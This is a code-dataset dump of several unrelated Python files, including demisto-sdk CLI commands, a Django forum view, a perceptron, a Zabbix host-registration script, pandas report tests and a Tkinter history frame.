\"\n f\"along with the pack name.\")\n sys.exit(0)\n if _packs:\n for pack in _packs:\n if pack in packs_existing_rn and update_type is None:\n existing_rn_version = packs_existing_rn[pack]\n elif pack in packs_existing_rn and update_type is not None:\n print_error(f\"New release notes file already found for {pack}. \"\n f\"Please update manually or run `demisto-sdk update-release-notes \"\n f\"-i {pack}` without specifying the update_type.\")\n continue\n\n pack_modified = filter_files_on_pack(pack, filtered_modified)\n pack_added = filter_files_on_pack(pack, filtered_added)\n pack_old = filter_files_on_pack(pack, old)\n\n # default case:\n if pack_modified or pack_added or pack_old:\n update_pack_rn = UpdateRN(pack_path=f'Packs/{pack}', update_type=update_type,\n modified_files_in_pack=pack_modified.union(pack_old), pre_release=pre_release,\n added_files=pack_added, specific_version=specific_version, text=text,\n existing_rn_version_path=existing_rn_version)\n updated = update_pack_rn.execute_update()\n # if new release notes were created and if previous release notes existed, remove previous\n if updated and update_pack_rn.should_delete_existing_rn:\n os.unlink(packs_existing_rn[pack])\n\n else:\n print_warning(f'Either no changes were found in {pack} pack '\n f'or the changes found should not be documented in the release notes file '\n f'If relevant changes were made, please commit the changes and rerun the command')\n else:\n print_warning('No changes that require release notes were detected. If such changes were made, '\n 'please commit the changes and rerun the command')\n sys.exit(0)\n\n\n# ====================== find-dependencies ====================== #\n@main.command()\n@click.option(\n \"-i\", \"--input\", help=\"Pack path to find dependencies. For example: Pack/HelloWorld\", required=True,\n type=click.Path(exists=True, dir_okay=True))\n@click.option(\n \"-idp\", \"--id-set-path\", help=\"Path to id set json file.\", required=False)\n@click.option(\n \"--no-update\", help=\"Use to find the pack dependencies without updating the pack metadata.\", required=False,\n is_flag=True)\n@click.option('-v', \"--verbose\", help=\"Whether to print the log to the console.\", required=False,\n is_flag=True)\n@click.option(\"--use-pack-metadata\", help=\"Whether to update the dependencies from the pack metadata.\", required=False,\n is_flag=True)\ndef find_dependencies(**kwargs):\n \"\"\"Find pack dependencies and update pack metadata.\"\"\"\n check_configuration_file('find-dependencies', kwargs)\n update_pack_metadata = not kwargs.get('no_update')\n input_path: Path = kwargs[\"input\"] # To not shadow python builtin `input`\n verbose = kwargs.get('verbose', False)\n id_set_path = kwargs.get('id_set_path', '')\n use_pack_metadata = kwargs.get('use_pack_metadata', False)\n try:\n assert \"Packs/\" in str(input_path)\n pack_name = str(input_path).replace(\"Packs/\", \"\")\n assert \"/\" not in str(pack_name)\n except AssertionError:\n print_error(\"Input path is not a pack. For example: Packs/HelloWorld\")\n sys.exit(1)\n try:\n PackDependencies.find_dependencies(\n pack_name=pack_name,\n id_set_path=str(id_set_path),\n verbose=verbose,\n update_pack_metadata=update_pack_metadata,\n use_pack_metadata=use_pack_metadata\n )\n except ValueError as exp:\n print_error(str(exp))\n\n\n# ====================== postman-codegen ====================== #\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n '-i', '--input',\n help='The Postman collection 2.1 JSON file',\n required=True, type=click.File())\n@click.option(\n '-o', '--output',\n help='The output directory to save the config file or the integration',\n type=click.Path(dir_okay=True, exists=True),\n default=Path('.'),\n show_default=True\n)\n@click.option(\n '-n', '--name',\n help='The output integration name')\n@click.option(\n '-op', '--output-prefix',\n help='The global integration output prefix. By default it is the product name.'\n)\n@click.option(\n '-cp', '--command-prefix',\n help='The prefix for each command in the integration. By default is the product name in lower case'\n)\n@click.option(\n '--config-out',\n help='Used for advanced integration customisation. Generates a config json file instead of integration.',\n is_flag=True\n)\n@click.option(\n '--verbose', help='Print debug level logs', is_flag=True)\ndef postman_codegen(\n input: IO,\n output: Path,\n name: str,\n output_prefix: str,\n command_prefix: str,\n config_out: bool,\n verbose: bool\n):\n \"\"\"Generates a Cortex XSOAR integration given a Postman collection 2.1 JSON file.\"\"\"\n if verbose:\n logger = logging_setup(verbose=3)\n else:\n logger = logging.getLogger('demisto-sdk')\n\n config = postman_to_autogen_configuration(\n collection=json.load(input),\n name=name,\n command_prefix=command_prefix,\n context_path_prefix=output_prefix\n )\n\n if config_out:\n path = output / f'config-{config.name}.json'\n with open(path, mode='w+') as f:\n json.dump(config.to_dict(), f, indent=4)\n logger.info(f'Config file generated at:\\n{os.path.abspath(path)}')\n else:\n # generate integration yml\n config.generate_integration_package(output, is_unified=True)\n\n\n# ====================== generate-integration ====================== #\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n '-i', '--input',\n help='config json file produced by commands like postman-codegen and openapi-codegen',\n required=True,\n type=click.File()\n)\n@click.option(\n '-o', '--output',\n help='The output directory to save the integration package',\n type=click.Path(dir_okay=True, exists=True),\n default=Path('.')\n)\n@click.option(\n '--verbose',\n help='Print debug level logs',\n is_flag=True\n)\ndef generate_integration(input: IO, output: Path, verbose: bool):\n \"\"\"Generates a Cortex XSOAR integration from a config json file,\n which is generated by commands like postman-codegen\n \"\"\"\n if verbose:\n logging_setup(verbose=3)\n\n config_dict = json.load(input)\n config = IntegrationGeneratorConfig(**config_dict)\n\n config.generate_integration_package(output, True)\n\n\n# ====================== openapi-codegen ====================== #\n@main.command(short_help='''Generates a Cortex XSOAR integration given an OpenAPI specification file.''')\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n '-i', '--input_file', help='The swagger file to load in JSON format', required=True)\n@click.option(\n '-cf', '--config_file', help='The integration configuration file. It is created in the first run of the command',\n required=False)\n@click.option(\n '-n', '--base_name', help='The base filename to use for the generated files', required=False)\n@click.option(\n '-o', '--output_dir', help='Directory to store the output in (default is current working directory)',\n required=False)\n@click.option(\n '-pr', '--command_prefix', help='Add a prefix to each command in the code', required=False)\n@click.option(\n '-c', '--context_path', help='Context output path', required=False)\n@click.option(\n '-u', '--unique_keys', help='Comma separated unique keys to use in context paths (case sensitive)', required=False)\n@click.option(\n '-r', '--root_objects', help='Comma separated JSON root objects to use in command outputs (case sensitive)',\n required=False)\n@click.option(\n '-v', '--verbose', is_flag=True, help='Be verbose with the log output')\n@click.option(\n '-f', '--fix_code', is_flag=True, help='Fix the python code using autopep8')\n@click.option(\n '-a', '--use_default', is_flag=True, help='Use the automatically generated integration configuration'\n ' (Skip the second run).')\ndef openapi_codegen(**kwargs):\n \"\"\"Generates a Cortex XSOAR integration given an OpenAPI specification file.\n In the first run of the command, an integration configuration file is created, which can be modified.\n Then, the command is run a second time with the integration configuration to generate the actual integration files.\n \"\"\"\n check_configuration_file('openapi-codegen', kwargs)\n if not kwargs.get('output_dir'):\n output_dir = os.getcwd()\n else:\n output_dir = kwargs['output_dir']\n\n # Check the directory exists and if not, try to create it\n if not os.path.exists(output_dir):\n try:\n os.mkdir(output_dir)\n except Exception as err:\n tools.print_error(f'Error creating directory {output_dir} - {err}')\n sys.exit(1)\n if not os.path.isdir(output_dir):\n tools.print_error(f'The directory provided \"{output_dir}\" is not a directory')\n sys.exit(1)\n\n input_file = kwargs['input_file']\n base_name = kwargs.get('base_name')\n if base_name is None:\n base_name = 'GeneratedIntegration'\n\n command_prefix = kwargs.get('command_prefix')\n if command_prefix is None:\n command_prefix = '-'.join(base_name.split(' ')).lower()\n\n context_path = kwargs.get('context_path')\n if context_path is None:\n context_path = base_name.replace(' ', '')\n\n unique_keys = kwargs.get('unique_keys', '')\n if unique_keys is None:\n unique_keys = ''\n\n root_objects = kwargs.get('root_objects', '')\n if root_objects is None:\n root_objects = ''\n\n verbose = kwargs.get('verbose', False)\n fix_code = kwargs.get('fix_code', False)\n\n configuration = None\n if kwargs.get('config_file'):\n try:\n with open(kwargs['config_file'], 'r') as config_file:\n configuration = json.load(config_file)\n except Exception as e:\n print_error(f'Failed to load configuration file: {e}')\n\n click.echo('Processing swagger file...')\n integration = OpenAPIIntegration(input_file, base_name, command_prefix, context_path,\n unique_keys=unique_keys, root_objects=root_objects,\n verbose=verbose, fix_code=fix_code, configuration=configuration)\n\n integration.load_file()\n if not kwargs.get('config_file'):\n integration.save_config(integration.configuration, output_dir)\n tools.print_success(f'Created configuration file in {output_dir}')\n if not kwargs.get('use_default', False):\n config_path = os.path.join(output_dir, f'{base_name}.json')\n command_to_run = f'demisto-sdk openapi-codegen -i \"{input_file}\" -cf \"{config_path}\" -n \"{base_name}\" ' \\\n f'-o \"{output_dir}\" -pr \"{command_prefix}\" -c \"{context_path}\"'\n if unique_keys:\n command_to_run = command_to_run + f' -u \"{unique_keys}\"'\n if root_objects:\n command_to_run = command_to_run + f' -r \"{root_objects}\"'\n if verbose:\n command_to_run = command_to_run + ' -v'\n if fix_code:\n command_to_run = command_to_run + ' -f'\n\n click.echo(f'Run the command again with the created configuration file(after a review): {command_to_run}')\n sys.exit(0)\n\n if integration.save_package(output_dir):\n tools.print_success(f'Successfully finished generating integration code and saved it in {output_dir}')\n else:\n tools.print_error(f'There was an error creating the package in {output_dir}')\n sys.exit(1)\n\n\n# ====================== test-content command ====================== #\n@main.command(\n short_help='''Created incidents for selected test-playbooks and gives a report about the results''',\n hidden=True\n)\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n '-k', '--api-key', help='The Demisto API key for the server', required=True)\n@click.option(\n '-s', '--server', help='The server URL to connect to')\n@click.option(\n '-c', '--conf', help='Path to content conf.json file', required=True)\n@click.option(\n '-e', '--secret', help='Path to content-test-conf conf.json file')\n@click.option(\n '-n', '--nightly', type=bool, help='Run nightly tests')\n@click.option(\n '-t', '--slack', help='The token for slack', required=True)\n@click.option(\n '-a', '--circleci', help='The token for circleci', required=True)\n@click.option(\n '-b', '--build-number', help='The build number', required=True)\n@click.option(\n '-g', '--branch-name', help='The current content branch name', required=True)\n@click.option(\n '-i', '--is-ami', type=bool, help='is AMI build or not', default=False)\n@click.option(\n '-m',\n '--mem-check',\n type=bool,\n help='Should trigger memory checks or not. The slack channel to check the data is: '\n 'dmst_content_nightly_memory_data',\n default=False)\n@click.option(\n '-d',\n '--server-version',\n help='Which server version to run the tests on(Valid only when using AMI)',\n default=\"NonAMI\")\ndef test_content(**kwargs):\n \"\"\"Configure instances for the integration needed to run tests_to_run tests.\n Run test module on each integration.\n create an investigation for each test.\n run test playbook on the created investigation using mock if possible.\n Collect the result and give a report.\n \"\"\"\n check_configuration_file('test-content', kwargs)\n execute_test_content(**kwargs)\n\n\n# ====================== doc-review ====================== #\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n '-i', '--input', type=str, help='The path to the file to check')\n@click.option(\n '--no-camel-case', is_flag=True, help='Whether to check CamelCase words', default=False)\n@click.option(\n '--known-words', type=str, help=\"The path to a file containing additional known words\"\n)\n@click.option(\n '--always-true', is_flag=True, help=\"Whether to fail the command if misspelled words are found\"\n)\n@click.option(\n '--expand-dictionary', is_flag=True, help=\"Whether to expand the base dictionary to include more words - \"\n \"will download 'brown' corpus from nltk package\"\n)\n@click.option(\n '--templates', is_flag=True, help=\"Whether to print release notes templates\"\n)\n@click.option(\n '-g', '--use-git', is_flag=True, help=\"Use git to identify the relevant changed files, \"\n \"will be used by default if '-i' and '--templates' are not set\"\n)\n@click.option(\n '--prev-ver', type=str, help=\"The branch against which changes will be detected \"\n \"if '-g' flag is set. Default is 'demisto/master'\"\n)\n@click.option(\n '-rn', '--release-notes', is_flag=True, help=\"Will run only on release notes files\"\n)\ndef doc_review(**kwargs):\n \"\"\"Check the spelling in .md and .yml files as well as review release notes\"\"\"\n doc_reviewer = DocReviewer(\n file_path=kwargs.get('input'),\n known_words_file_path=kwargs.get('known_words'),\n no_camel_case=kwargs.get('no_camel_case'),\n no_failure=kwargs.get('always_true'),\n expand_dictionary=kwargs.get('expand_dictionary'),\n templates=kwargs.get('templates'),\n use_git=kwargs.get('use_git'),\n prev_ver=kwargs.get('prev_ver'),\n release_notes_only=kwargs.get('release_notes'),\n )\n result = doc_reviewer.run_doc_review()\n if result:\n sys.exit(0)\n\n sys.exit(1)\n\n\n# ====================== integration-diff ====================== #\n@main.command(name=\"integration-diff\",\n help='''Given two versions of an integration, Check that everything in the old integration is covered in\n the new integration''')\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n '-n', '--new', type=str, help='The path to the new version of the integration', required=True)\n@click.option(\n '-o', '--old', type=str, help='The path to the old version of the integration', required=True)\ndef integration_diff(**kwargs):\n \"\"\"\n Checks for differences between two versions of an integration, and verified that the new version covered the old version.\n \"\"\"\n\n integration_diff_detector = IntegrationDiffDetector(kwargs.get('new', ''), kwargs.get('old', ''))\n result = integration_diff_detector.check_diff()\n\n if result:\n sys.exit(0)\n\n sys.exit(1)\n\n\n@main.resultcallback()\ndef exit_from_program(result=0, **kwargs):\n sys.exit(result)\n\n\n# todo: add download from demisto command\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"demisto_sdk/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":63825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"32007255","text":"from django.http import HttpResponse\nfrom forum.controllers import Answer as AnswerController\nfrom django.views.decorators.csrf import csrf_exempt\n\n@csrf_exempt\ndef add(request):\n\tparams = request.POST #request.body\n\tif (not(\"username\" in request.session.keys())):\n\t\treturn HttpResponse(\"Unauthenticated user\", status = 401)\n\n\tauthor = request.session['username']\n\tanswer = params['answer']\n\tquestion = params['question']\n\n\tsuccess, message = AnswerController.add(answer, question, author)\n\tif (success == 0):\n\t\treturn HttpResponse(\"Answer added successfully\", status=201)\n\telif(success == 1):\n\t\treturn HttpResponse(message, status = 400) # question/asker id is invalid.\n\telse:\n\t\treturn HttpResponse(\"Couldn't serve request, try again later!\", status = 500) ","sub_path":"forum/views/Answer.py","file_name":"Answer.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"180183655","text":"\"\"\"\nauthor : Vishal\n\n\"\"\"\n\nimport numpy as np\nfrom tqdm import tqdm\nimport logging\n\nclass Perceptron:\n \n def __init__(self,eta,epochs):\n np.random.seed(101)\n self.weights = np.random.randn(3) * 1e-4 ## to make the weight small while initialization\n logging.info(f\"Initial weights before training : \\n{self.weights}\")\n self.eta = eta\n self.epochs = epochs\n \n def activationFunction(self,inputs,weights):\n z = np.dot(inputs,weights)\n return np.where(z>0,1,0)\n \n def fit(self,x,y):\n self.x = x\n self.y = y\n\n x_with_bias = np.c_[self.x, -np.ones(( len(self.x),1 ))]\n logging.info(f\"x with bias: \\n{x_with_bias}\")\n\n for epoch in tqdm(range(self.epochs),total=self.epochs,desc=\"training the model\"):\n logging.info(\"--\"*10)\n logging.info(f\"for epoch: {epoch}\")\n logging.info(\"--\"*10)\n\n y_hat = self.activationFunction(x_with_bias,self.weights) ## forward propagation\n logging.info(f\"predicted value after forward pass: \\n{y_hat}\")\n\n self.error = self.y - y_hat\n logging.info(f\"error: \\n{self.error}\")\n\n self.weights = self.weights + self.eta * np.dot(x_with_bias.T,self.error) ## backward propagation\n logging.info(f\"updated weights after epoch:\\n{epoch}/{self.epochs} : \\n{self.weights}\")\n logging.info(\"##\"*10)\n\n def predict(self,x):\n x_with_bias = np.c_[x, -np.ones((len(x),1))]\n return self.activationFunction(x_with_bias,self.weights)\n\n\n def total_loss(self):\n total_loss = np.sum(self.error)\n logging.info(f\"total loss: {total_loss}\")\n return total_loss\n","sub_path":"src/perceptron_vb/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"173550925","text":"from .Loss import Loss\nfrom .utils import give_net\nimport numpy as np\nfrom torchvision.models import vgg19\nimport torch\nfrom .conf import DEVICE\n\n\nclass GeometricLoss(Loss):\n def __init__(self, *args, **kwargs):\n super(GeometricLoss, self).__init__()\n self.net = give_net(vgg19(True).features[:12], 12).to(DEVICE)\n\n def forward(self, output, target, *args, **kwargs):\n output = self.net(output)\n target = self.net(target)\n\n vectorH = torch.Tensor([i for i in np.arange(output.size()[-1])]).to(DEVICE)\n vectorW = torch.Tensor([i for i in np.arange(output.size()[-2])]).to(DEVICE)\n\n d_o = output @ vectorH / output.sum()\n w_o = vectorW @ output / output.sum()\n d_t = target @ vectorH / target.sum()\n w_t = vectorW @ target / target.sum()\n\n return ((d_t - d_o) ** 2 + (w_t - w_o) ** 2).sum()\n","sub_path":"RaGAN/GL.py","file_name":"GL.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"267523384","text":"import os\nimport sys\nimport unittest\nimport pandas as pd\n\nfrom unittest.mock import patch\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\")))\n\nfrom utils import mocks # noqa: E402\nfrom reportforce import Reportforce # noqa: E402\nfrom reportforce.helpers.parsers import get_columns_labels # noqa: E402\n\nmock_metadata = mocks.get_json(\"analytics_matrix_metadata\")\nmock_report = mocks.get_json(\"analytics_matrix\")\n\n\nindices = pd.MultiIndex.from_tuples(\n [\n (\"Supervisor1\", \"Worker1\"),\n (\"Supervisor1\", \"Worker2\"),\n (\"Supervisor2\", \"Worker3\"),\n (\"Supervisor2\", \"Worker4\"),\n (\"Supervisor2\", \"Worker5\"),\n (\"Supervisor2\", \"Worker6\"),\n (\"Supervisor2\", \"Worker7\"),\n (\"Supervisor2\", \"Worker8\"),\n (\"Supervisor3\", \"Worker9\"),\n (\"Supervisor4\", \"Worker10\"),\n (\"Supervisor4\", \"Worker11\"),\n (\"Supervisor4\", \"Worker12\"),\n ],\n names=[\"Supervisor\", \"Worker\"],\n)\n\ncolumns = pd.MultiIndex.from_tuples(\n [\n (\"Row Sum\", \"Product\", \"DeliveryDay1\"),\n (\"Row Sum\", \"Product\", \"DeliveryDay2\"),\n (\"Row Sum\", \"Product\", \"DeliveryDay3\"),\n (\"Row Sum\", \"Product\", \"DeliveryDay4\"),\n ],\n names=[\"\", \"Product\", \"Delivery Day\"],\n)\n\nexpected_df = pd.DataFrame(\n [\n [\"0_0!0_0\", \"0_0!0_1\", \"0_0!0_2\", \"0_0!0_3\"],\n [\"0_1!0_0\", \"0_1!0_1\", \"0_1!0_2\", \"0_1!0_3\"],\n [\"1_0!0_0\", \"1_0!0_1\", \"1_0!0_2\", \"1_0!0_3\"],\n [\"1_1!0_0\", \"1_1!0_1\", \"1_1!0_2\", \"1_1!0_3\"],\n [\"1_2!0_0\", \"1_2!0_1\", \"1_2!0_2\", \"1_2!0_3\"],\n [\"1_3!0_0\", \"1_3!0_1\", \"1_3!0_2\", \"1_3!0_3\"],\n [\"1_4!0_0\", \"1_4!0_1\", \"1_4!0_2\", \"1_4!0_3\"],\n [\"1_5!0_0\", \"1_5!0_1\", \"1_5!0_2\", \"1_5!0_3\"],\n [\"2_0!0_0\", \"2_0!0_1\", \"2_0!0_2\", \"2_0!0_3\"],\n [\"3_0!0_0\", \"3_0!0_1\", \"3_0!0_2\", \"3_0!0_3\"],\n [\"3_1!0_0\", \"3_1!0_1\", \"3_1!0_2\", \"3_1!0_3\"],\n [\"3_2!0_0\", \"3_2!0_1\", \"3_2!0_2\", \"3_2!0_3\"],\n ],\n index=indices,\n columns=columns,\n)\n\n\nclass TestMatrixReport(unittest.TestCase):\n maxDiff = None\n\n def setUp(self):\n mocks.mock_get_metadata(\"analytics_matrix_metadata\").start()\n mocks.mock_login().start()\n\n self.rf = Reportforce(\"foo@bar.com\", \"1234\", \"XXX\")\n\n @patch.object(Reportforce.session, \"post\")\n def test_dataframe(self, post):\n \"\"\"Test if it returns the expected DataFrame.\"\"\"\n\n post().json.return_value = mock_report\n\n df = self.rf.get_report(\"ReportID\")\n pd.testing.assert_frame_equal(expected_df, df)\n\n @patch.object(Reportforce.session, \"post\")\n def test_empty_matrix(self, post):\n \"\"\"Test if returns an empty DataFrame when the matrix is empty.\"\"\"\n\n mock_factmap = {\n \"T!T\": {\"aggregates\": {\"label\": \"label\", \"value\": \"value\"}, \"rows\": []}\n }\n\n with patch.dict(mock_report, mock_report, factMap=mock_factmap):\n post().json.return_value = mock_report\n df = self.rf.get_report(\"ReportID\")\n\n self.assertTrue(df.empty)\n\n def test_get_columns_labels_of_a_matrix(self):\n \"\"\"Test get columns labels of a matrix.\"\"\"\n\n test = get_columns_labels(mock_report)\n expected = {\n \"Delivery Day\": \"Delivery Day\",\n \"Product\": \"Product\",\n \"Supervisor\": \"Supervisor\",\n \"Worker\": \"Worker\",\n }\n self.assertDictEqual(test, expected)\n\n def tearDown(self):\n patch.stopall()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n\n# vi: nowrap\n","sub_path":"tests/test_matrix.py","file_name":"test_matrix.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"418785992","text":"#!/usr/bin/env python\nimport os, requests, json, sys, socket, fcntl, struct\nfrom requests.auth import HTTPBasicAuth\n\nzabbix_server = \"192.168.56.101\"\nzabbix_api_admin_name = \"Admin\"\nzabbix_api_admin_password = \"zabbix\"\nhostname = socket.gethostname()\n\n\ndef post(request):\n headers = {'content-type': 'application/json'}\n return requests.post(\n \"http://\" + zabbix_server + \"/api_jsonrpc.php\",\n data=json.dumps(request),\n headers=headers,\n auth=HTTPBasicAuth(zabbix_api_admin_name, zabbix_api_admin_password)\n )\n\ndef get_ip_address(ifname):\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n return socket.inet_ntoa(fcntl.ioctl(\n s.fileno(),\n 0x8915, # SIOCGIFADDR\n struct.pack('256s', ifname[:15])\n )[20:24])\n\nip = get_ip_address('enp0s8')\n\n\n\n\nauth_token = post({\n \"jsonrpc\": \"2.0\",\n \"method\": \"user.login\",\n \"params\": {\n \"user\": zabbix_api_admin_name,\n \"password\": zabbix_api_admin_password\n },\n \"auth\": None,\n \"id\": 0}\n).json()[\"result\"]\n\n#####################new group\ndef create_group():\n return post({\n \"jsonrpc\": \"2.0\",\n \"method\": \"hostgroup.create\",\n \"params\": {\n \"name\": \"CloudHosts\"\n\n },\n\t\"auth\": auth_token,\n \"id\": 1\n }).json()[\"result\"][\"groupids\"][0]\n\n###########################check group\n\ndef if_group():\n return post({\n\t\"jsonrpc\": \"2.0\",\n \"method\": \"hostgroup.get\",\n \"params\": {\n \"output\": \"extend\",\n \"filter\": {\n \"name\": [\n \"CloudHosts\"\n ]\n }\n },\n\t\"auth\": auth_token,\n\n \"id\": 1\n }).json()[\"result\"][0][\"groupid\"]\n\n\ntry:\n#\tif_group()\n\tidid = if_group()\nexcept:\n#\tif_group()\n\tidid = create_group()\n \nprint(idid)\n\n\n\n \n\ndef register_host(hostname, ip,myid):\n post({\n\t\"jsonrpc\": \"2.0\",\n \"method\": \"host.create\",\n \"params\": {\n \"host\": hostname,\n \"templates\": [{\n \"templateid\": \"10001\"\n }],\n \"interfaces\": [{\n \"type\": 1,\n \"main\": 1,\n \"useip\": 1,\n \"ip\": ip,\n \"dns\": \"\",\n \"port\": \"10050\"\n }],\n \"groups\": [\n {\"groupid\": \"1\"},\n {\"groupid\": \"2\"},\n {\"groupid\": myid}\n ]\n\t},\n\t\"auth\": auth_token,\n \"id\": 1\n })\n\nregister_host(hostname, ip, idid)\n\n","sub_path":"zabbix2.py","file_name":"zabbix2.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"54405045","text":"from flask import request, current_app as app, jsonify\nfrom ..blueprint import Blueprint\nimport subprocess\nfrom elpis.wrappers.objects.interface import KaldiInterface\nfrom elpis.wrappers.objects.model import Model\nfrom elpis.wrappers.objects.dataset import Dataset\nfrom elpis.wrappers.objects.pron_dict import PronDict\n\nfrom pathlib import Path\n\nbp = Blueprint(\"model\", __name__, url_prefix=\"/model\")\n\n\ndef run(cmd: str) -> str:\n import shlex\n \"\"\"Captures stdout/stderr and writes it to a log file, then returns the\n CompleteProcess result object\"\"\"\n args = shlex.split(cmd)\n process = subprocess.run(\n args,\n check=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT\n )\n return process.stdout\n\n\n@bp.route(\"/new\", methods=['POST'])\ndef new():\n kaldi: KaldiInterface = app.config['INTERFACE']\n model = kaldi.new_model(request.json[\"name\"])\n # use the selected pron dict\n pron_dict = kaldi.get_pron_dict(request.json['pron_dict_name'])\n # get its dataset\n dataset = kaldi.get_dataset(pron_dict.dataset.name)\n app.config['CURRENT_DATASET'] = dataset\n app.config['CURRENT_PRON_DICT'] = pron_dict\n model.link(dataset, pron_dict)\n model.build_kaldi_structure()\n app.config['CURRENT_MODEL'] = model\n data = {\n \"config\": model.config._load()\n }\n return jsonify({\n \"status\": 200,\n \"data\": data\n })\n\n\n@bp.route(\"/load\", methods=['POST'])\ndef load():\n kaldi: KaldiInterface = app.config['INTERFACE']\n model = kaldi.get_model(request.json[\"name\"])\n # set the dataset to match the model\n app.config['CURRENT_DATASET'] = model.dataset\n app.config['CURRENT_PRON_DICT'] = model.pron_dict\n app.config['CURRENT_MODEL'] = model\n data = {\n \"config\": model.config._load()\n }\n return jsonify({\n \"status\": 200,\n \"data\": data\n })\n\n\n@bp.route(\"/list\", methods=['GET'])\ndef list_existing():\n kaldi: KaldiInterface = app.config['INTERFACE']\n fake_results = {}\n data = {\n \"list\": [{\n 'name': model['name'],\n 'results': fake_results,\n 'dataset_name': model['dataset_name'],\n 'pron_dict_name': model['pron_dict_name']\n } for model in kaldi.list_models_verbose()]\n }\n return jsonify({\n \"status\": 200,\n \"data\": data\n })\n\n\n@bp.route(\"/settings\", methods=['POST'])\ndef settings():\n model = app.config['CURRENT_MODEL']\n if model is None:\n return jsonify({\"status\":404, \"data\": \"No current model exists (perhaps create one first)\"})\n if request.method == 'POST':\n model.ngram = request.json['ngram']\n data = {\n \"settings\":{\n \"ngram\": model.ngram\n }\n }\n return jsonify({\n \"status\": 200,\n \"data\": data\n })\n\n\n@bp.route(\"/train\", methods=['GET'])\ndef train():\n model: Model = app.config['CURRENT_MODEL']\n if model is None:\n return jsonify({\"status\":404, \"data\": \"No current model exists (perhaps create one first)\"})\n model.train(on_complete=lambda: print(\"Training complete!\"))\n data = {\n \"status\": model.status\n }\n return jsonify({\n \"status\": 200,\n \"data\": data\n })\n\n\n@bp.route(\"/status\", methods=['GET'])\ndef status():\n model: Model = app.config['CURRENT_MODEL']\n if model is None:\n return jsonify({\"status\":404, \"data\": \"No current model exists (perhaps create one first)\"})\n data = {\n \"status\": model.status\n }\n return jsonify({\n \"status\": 200,\n \"data\": data\n })\n\n\n@bp.route(\"/results\", methods=['GET'])\ndef results():\n model: Model = app.config['CURRENT_MODEL']\n if model is None:\n return jsonify({\"status\":404, \"data\": \"No current model exists (perhaps create one first)\"})\n wer_lines = []\n log_file = Path('/elpis/state/tmp_log.txt')\n results = {}\n if log_file.exists():\n with log_file.open() as fin:\n for line in reversed(list(fin)):\n line = line.rstrip()\n if \"%WER\" in line:\n # use line to sort by best val\n line_r = line.replace('%WER ', '')\n wer_lines.append(line_r)\n wer_lines.sort(reverse = True)\n line = wer_lines[0]\n line_split = line.split(None, 1)\n wer = line_split[0]\n line_results = line_split[1]\n line_results = line_results.replace('[','')\n line_results = line_results.replace(']','')\n results_split = line_results.split(',')\n count_val = results_split[0].strip()\n ins_val = results_split[1].replace(' ins','').strip()\n del_val = results_split[2].replace(' del','').strip()\n sub_val = results_split[3].replace(' sub','').strip()\n results = {'wer':wer, 'count_val':count_val, 'ins_val':ins_val, 'del_val':del_val, 'sub_val':sub_val}\n print(results)\n else:\n return jsonify({\"status\":404, \"data\": \"No log file was found, couldn't parse the results\"})\n data = {\n \"results\": results\n }\n return jsonify({\n \"status\": 200,\n \"data\": data\n })\n","sub_path":"elpis/endpoints/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"157814218","text":"from tkinter import *\nimport pickle\nimport os\n\n\nclass HistoryFrame:\n def __init__(self, mf):\n self.main_frame = mf\n\n self.frame = Frame(self.main_frame, width=1050, height=560, bg=\"#f1f1f1\")\n\n # Loading the data history\n parent = os.path.abspath(os.path.join('frames', os.pardir))\n self.data = pickle.loads(open(parent+\"/data/hist_data.pickle\", \"rb\").read())\n\n self.header_frame_data()\n\n self.frame_container = Frame(self.frame, bg=\"#FAFAFA\")\n self.frame_container.place(x=130, y=80)\n self.frame_data = None\n self.canvas_scroll()\n self.create_list()\n\n def header_frame_data(self):\n\n frame_header = Frame(self.frame, width=800, height=60, bg=\"#102027\")\n Label(frame_header, text=\"ID\", bg=\"#102027\", fg=\"#ffffff\", font=(\"Roboto\", 17)).place(x=20, y=13)\n Label(frame_header, text=\"Date\", bg=\"#102027\", fg=\"#ffffff\", font=(\"Roboto\", 17)).place(x=190, y=13)\n Label(frame_header, text=\"Votes\", bg=\"#102027\", fg=\"#ffffff\", font=(\"Roboto\", 17)).place(x=440, y=13)\n Label(frame_header, text=\"Average\", bg=\"#102027\", fg=\"#ffffff\", font=(\"Roboto\", 17)).place(x=560, y=13)\n Label(frame_header, text=\"Mode\", bg=\"#102027\", fg=\"#ffffff\", font=(\"Roboto\", 17)).place(x=690, y=13)\n frame_header.place(x=130, y=20)\n\n def canvas_scroll(self):\n vscrollbar = Scrollbar(self.frame_container, orient=VERTICAL)\n vscrollbar.pack(fill=Y, side=RIGHT, expand=FALSE)\n canvas = Canvas(self.frame_container, height=450, bd=0, highlightthickness=0,\n yscrollcommand=vscrollbar.set)\n canvas.pack(side=LEFT, fill=BOTH, expand=TRUE)\n vscrollbar.config(command=canvas.yview)\n\n # reset the view\n canvas.xview_moveto(0)\n canvas.yview_moveto(0)\n\n # create a frame inside the canvas which will be 